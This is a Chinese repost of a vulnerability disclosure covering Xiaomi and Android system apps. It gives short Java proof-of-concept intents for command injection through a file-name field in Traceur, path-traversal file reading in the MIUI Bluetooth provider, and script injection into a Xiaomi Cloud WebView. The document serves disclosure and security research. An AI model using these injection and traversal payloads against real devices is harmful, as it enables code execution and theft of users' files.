下文来源 :oversecured.com
系统跟踪应用程序 的过度安全扫描报告包含以下漏洞:com.android.traceur
系统跟踪应用程序的过度安全扫描报告包含以下漏洞:
com.android.traceur
POC:
Intent i = new Intent("com.android.traceur.AppReceiver");
i.putExtra("ACTION", "traceutil_delete");
i.putExtra("ACTION_DELETE_FILE", ".perfetto-trace && log -t evil 1337");
sendBroadcast(i);
MIUI 蓝牙 - 使用android.uid.bluetooth权限盗窃任意文件
MIUI 蓝牙应用 的过度安全扫描报告包含以下漏洞:com.xiaomi.bluetooth
该应用程序包括导出的提供程序。它不会以某种方式验证生成的对象,从而允许攻击者执行路径遍历攻击。它还使用标志进行声明,允许它访问具有相同标志和其他一些权限的其他应用程序。com.android.bluetooth.ble.app.headset.HeadsetProvider File android:sharedUserId="android.uid.bluetooth"
POC:
Uri uri = Uri.parse("content://com.android.bluetooth.ble.app.headset.provider/plugin_update/../../../../../sdcard/test.txt");
try (InputStream inputStream = getContentResolver().openInputStream(uri)) {
Log.d("evil", IOUtils.toString(inputStream));
} catch (Throwable th) {
throw new RuntimeException(th);
}
小米云-内置WebView中的XSS
小米云应用程序 的过度安全扫描报告包含以下漏洞: com.xiaomi.mipicks
该文件包含一个不受保护的动态注册的广播接收器,该接收器获取该值,将其连接到 JS 代码,然后执行它。 com/miui/cloudservice/hybrid/ShareLocationHybridActivity.java push_data
POC:
Intent i = new Intent("ACTION_DATA_CHANGED");
i.putExtra("push_data", "'-document.write(1337)-'");
sendBroadcast(i);
原文始发于微信公众号(合规渗透):小米设备存在的几个命令执行漏洞 -- 已提交修复
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论